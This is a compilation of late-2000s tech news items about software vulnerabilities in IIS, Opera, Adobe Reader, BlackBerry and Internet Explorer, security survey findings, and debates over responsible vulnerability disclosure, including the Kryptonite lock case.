Microsoft on Monday said it is looking into a report of a flaw in some versions of its Internet Information Services product that could allow an attacker to gain control of a system.
In a statement, a Microsoft representative said the company "is investigating new public claims of a possible vulnerability in IIS 5 and IIS 6 File Transfer Protocol (FTP)."
Microsoft said it is not aware of any attacks using the vulnerability. "We will take steps to determine how customers can protect themselves, should we confirm the vulnerability."
According to IDG News Service, code for exploiting the unpatched flaw was posted to the Milw0rm Web site. IDG said the exploit appears to affect primarily older versions of IIS--and only when the FTP function is enabled.
Once it is done with its investigation, Microsoft said, it will decide how to address the matter, which could include a security update as part of its monthly Patch Tuesday or an out-of-cycle update.
In a posting on Monday, the U.S. Computer Emergency Readiness Team (US-CERT) suggested IT administrators "disable anonymous write access to the FTP server to help mitigate the vulnerability" but added that "a proper impact analysis should be performed prior to taking defensive measures."
There is an old saying in the security world stating that people are the weakest link in the security chain. Here is a bit of data that reinforces this ancient security adage.
ESG Research recently conducted a project focused on confidential data security that will be published soon. However, here are some interesting advance results that support this venerable security dictum. ESG asked 308 North American and European security professionals from large organizations (i.e. 1,000 employees or more) a number of questions about data security risks, policies, and technology safeguards. When asked to define the most important measures for protecting confidential data, nearly half of all respondents said, "communicating and training users on confidential data security policies." This was the top response followed by, "physical security," and "access controls for private data."
Now here's the scary part. When asked to rate their organizations performance with regard to, "communicating and training users on confidential data security policies," more than one-fourth of security professionals gave their organization a rating of either "fair" or "poor." In other words, many organizations aren't doing a good job in the most important aspect related to data privacy and security-communicating and training employees. Yikes!
This problem appears to be more acute in Europe than North America. In North America, "only" 24 percent of security professionals responded either "fair" or "poor," while in Europe, the number increased to 38 percent. The problem is also more pronounced in the public sector where 34 percent of security professionals gave their organization a "fair" or "poor" rating. Finally, there is also a correlation with organizational size as larger firms do a better job at "communicating and training users on confidential data security policies" than smaller ones.
To me, the message is clear and frightening. The "people" part of information security (i.e. the most important part) is being minimized or managed very poorly. No wonder there are so many breaches! If this problem isn't addressed, we may as well give up. You could invest $1 billion in security technologies but if your people don't know about or understand the problem, you may as well leave the corporate networks wide open.
Opera on Tuesday released a critical security update, designed to fix vulnerabilities in its browser that could allow malicious attackers to use an altered JPEG to take control of a user's system.
The update for Opera version 9.64 is designed to address security vulnerabilities in earlier versions of Opera 9.
The vulnerabilities were found in Opera's plug-ins, which when exploited via a maliciously crafted JPEG image could cause Opera to corrupt memory and crash, potentially resulting in execution of arbitrary code and cross-site scripting, Opera noted in its advisory.
Security software company Secunia rates the vulnerabilities as "highly critical."
Update at 8:45 a.m. PST: Information from security firm Symantec added.
Attackers are making the rounds and exploiting a critical security flaw in Adobe Reader 9 and Acrobat 9.
Earlier versions of the PDF-related software are also affected by the critical security flaw, which could cause the applications to crash and potentially let an attacker gain control of a person's computer, Adobe Systems warned Thursday.
Reports also surfaced that attackers have developed an exploit and are taking advantage of the flaw, the company said.
Adobe has yet to develop an update to address the vulnerability but noted it expects to have one ready for Adobe Reader 9 and Acrobat 9 by March 11. After that, the company expects to launch updates for the earlier versions of the software going back to Adobe Reader 7 and Acrobat 7.
Until then, Adobe advises, people should update their virus definitions and exercise caution when opening documents from unknown sources.
Security company McAfee noted in a blog that the current attacks appear to be targeted ones but that it expects new variants of the exploit to make the rounds as more information becomes public.
In its posting, McAfee said that malicious PDF documents began to surface at the start of the year, exploiting a vulnerability in Adobe Reader versions 8 and 9. The attackers can then take advantage of a bug in Reader to overwrite memory at gain control of executing code. After that, attackers can install a Trojan horse and from there add a proverbial backdoor to a person's computer to remotely control and monitor the infected system.
Symantec, meanwhile, reports seeing the exploit used against only a few government agencies and large corporations, and within those organizations, only a few people are targeted, said Kevin Haley, a Symantec Security Response director.
"We've seen it used in only a few small places, so it tells us it's a targeted attack and someone is not trying to use it in a widespread way," Haley said, noting fewer than 100 people have been affected since it noticed the attacks on February 12.
But he added it seems likely other attackers may try to exploit the Adobe vulnerabilities and that the range of exploits may grow beyond the malware that Symantec calls Trojan.Pidief.E.
In its blog on Trojan.Pidief.E, Symantec advices users to consider disabling JavaScript in Adobe Reader and has provided instructions in a blog on a different issue.
More than half of the security vulnerabilities disclosed during 2008 had no patches available from the vendor by the end of the year, according to a report released on Monday by IBM's X-Force research group.
Vendors with the most vulnerabilities disclosed in 2008.
(Credit: IBM X-Force)Meanwhile, 46 percent of vulnerabilities from 2006 and 44 percent from 2007 still had no patch by the end of 2008, the 2008 X-Force Trend and Risk report said. X-Force documented a record number of 7,406 new vulnerabilities last year.
Overall, Microsoft is the vendor that tops the list in percentage of vulnerabilities disclosed, the report said. The Macintosh and base Linux kernel operating systems have dominated the top spots for vulnerabilities by operating system over the past three years, the report said. There were no breakdowns by vendor or operating system for unpatched vulnerabilities.
Most of the spam last year appeared to come from Russia (12 percent), followed by the U.S. (9.6 percent), and Turkey (7.8 percent), although the spam senders could be located in a different location, the report says.
China unseated the U.S. as the country hosting the largest number of malicious Web sites for the first time last year.
Meanwhile, 46 percent of all malware attacks last year were Trojans targeting people playing online games and doing online banking, and 90 percent of phishing attacks targeted financial institutions, according to the report.
Two main trends attackers used last year were SQL injection attacks, in which a small malicious script is inserted into a database that feeds information to the Web site, and malicious URLs hosting exploits.
The operating systems with the most vulnerability disclosures in 2008.
(Credit: IBM X-Force)Updated 2:25 p.m. PST to add that report does not list which vendors and operating system platforms had the most unpatched vulnerabilities.
Research In Motion issued on Monday interim patches to address critical security flaws in BlackBerry software.
The flaws affect BlackBerry Enterprise Server software version 4.1 Service Pack 3 through Service Pack 6. The BlackBerry Professional Software 4.1 Service Pack 4 is also affected, RIM notes in its security advisory.
RIM is asking corporate customers to install an interim patch for the BlackBerry Enterprise Server and an interim patch for the BlackBerry Professional Software.
RIM also advises BlackBerry users to open PDF attachments only from "trusted sources." The company notes in its security advisory:
Multiple security vulnerabilities exist in the PDF distiller of some released versions of the BlackBerry Attachment Service. These vulnerabilities could enable a malicious individual to send an email message containing a specially crafted PDF file, which when opened for viewing on a Blackberry smartphone, could cause memory corruption and possibly lead to arbitrary code execution on the computer that hosts the BlackBerry Attachment service.
Such security flaws will do little to bolster President-elect Barack Obama's hopes for keeping his BlackBerry while in the White House.
Microsoft released a critical security patch on Wednesday to plug vulnerabilities in Internet Explorer, a move that comes amid malicious attackers taking advantage of the security flaws.
The patch is designed to prevent attackers from downloading malware onto users' computers if they visit a malicious Web site, or a legitimate Web site that has been infected.
This zero-day exploit has been in circulation since the first week of December and potentially could have infected a wide swath of users.
The vulnerabilities are found in not only IE 7, Microsoft's latest browser, but also Internet Explorer 5.01, Internet Explorer 6, and Internet Explorer 6 Service Pack 1.
There has historically been a clash between security researchers who find security flaws in software products and the companies that make those products.
But two recent examples of cooperation between researchers and vendors show hope for future truces.
Leading by example was Dan Kaminsky, director of penetration testing for IOActive, who warned security software vendors about a fatal flaw in the DNS (Domain Name System) months before going public so vendors could release patches.
"What he and others he took into his confidence did over the last few months was not only responsible but extraordinary," my colleague Robert Vamosi wrote in a column about Kaminsky's unprecedented disclosure restraint.
This week, security researchers Robert "RSnake" Hansen and Jeremiah Grossman agreed to withdraw their presentation on a new Web attack they dubbed "Clickjacking" from an upcoming OWASP USA security conference in New York at Adobe Systems' request. Now, Adobe can create a patch for one of its applications before they release proof-of-concept code for the vulnerability, which would allow an attacker to take over the microphone, Webcam, and audio on a computer, according to a report on the Dark Reading site on Tuesday. (Oddly, the vulnerability is actually due to an architectural issue in Internet Explorer, the researchers say.)
"I've always had this philosophy. If you find a mediocre to bad vulnerability, it's better to just talk about it, get it out in the open, and let the world see it," RSnake wrote in a first-person account of the situation on Dark Reading. "However, I've always told myself if I found something like a complete remote desktop compromise or something equally bad, that I'd let the vendors know. The last thing I want to do is spawn a botnet army based on my research. There's a big difference between educating the community about a problem and empowering bad guys."
Most of the researcher-vendor conflict comes down to a matter of timing. Vendors tend to want researchers to keep mum until a fix is ready. And researchers want to go public sooner rather than later so that people relying on those products will know they are at risk. Also, going public can serve to motivate a vendor who might be dragging their feet on acknowledging and fixing the problem.
In 2002, Hewlett-Packard threatened to sue researchers who had publicized a vulnerability in the company's Tru64 Unix operating system. The case was notable in that it was the first time the Digital Millennium Copyright Act had been invoked to stifle research related to computer security.
Previously, the DMCA had been used to prosecute or threaten researchers who had discovered ways to break copyright protections. For instance, Russian programmer Dmitry Sklyarov went to jail in 2001 after Adobe convinced the Justice Department that he had violated the DMCA by breaking e-book protections, but he was later released. And Princeton University professor Edward Felten and his students withdrew a paper on how to break e-music protections after being threatened by the recording industry.
In 2005, Cisco Systems filed a lawsuit against security researcher Michael Lynn just hours after he gave a presentation at Defcon about how attackers could take over Cisco routers. That case was ultimately settled.
These threats and legal actions are unnecessary. Kaminsky, Hansen, and Grossman have shown that there can be compromise. That's a good lesson for three MIT students who pulled a talk at Defcon this summer on hacking the Massachusetts subway system, and for the transit officials who hauled them into court.
In 2004, a video circulated on the Internet showing how a standard Bic pen could be used to open the U-shaped Kryptonite bike lock. The company recalled the locks, replaced newer purchases, and changed the design for new locks. Problem solved, right?
Not exactly. Despite the fact that the problem had been revealed 12 years earlier in a British bike magazine, Kryptonite had continued to sell the locks unchanged. Angry customers filed a class action lawsuit that was settled in 2005, with Kryptonite offering to replace all affected locks or provide vouchers, and compensate people whose bicycles were stolen as a result of the lock being picked.
"If you don't make the problems public, the companies don't fix them and the consumers buy shoddy stuff," said Bruce Schneier, chief security technology officer at BT.
Bruce Schneier is chief security technology officer at BT.
(Credit: Schneier.com)There's been plenty written about breaking into the virtual locks that safeguard sensitive data on the Web. But the picking of real-world physical locks is becoming an increasingly popular pastime for some. Enthusiasts have formed sporting clubs and hold regular competitions. Security researchers write books about how locks can be broken into and show how it's done on blogs and videos and at security conferences.
Naturally, lock manufacturers aren't happy. They argue that publicizing the vulnerabilities causes people to panic unnecessarily and puts the public at risk by giving criminals information they can use to break door locks, safes, and other secured assets.
But, just like third-party disclosure of vulnerabilities in software forces manufacturers to acknowledge security holes and patch them quickly, lock manufacturers will find they can't escape the scrutiny and will have to be held accountable for their products, experts say.
... Read more- prev
- 1
- next
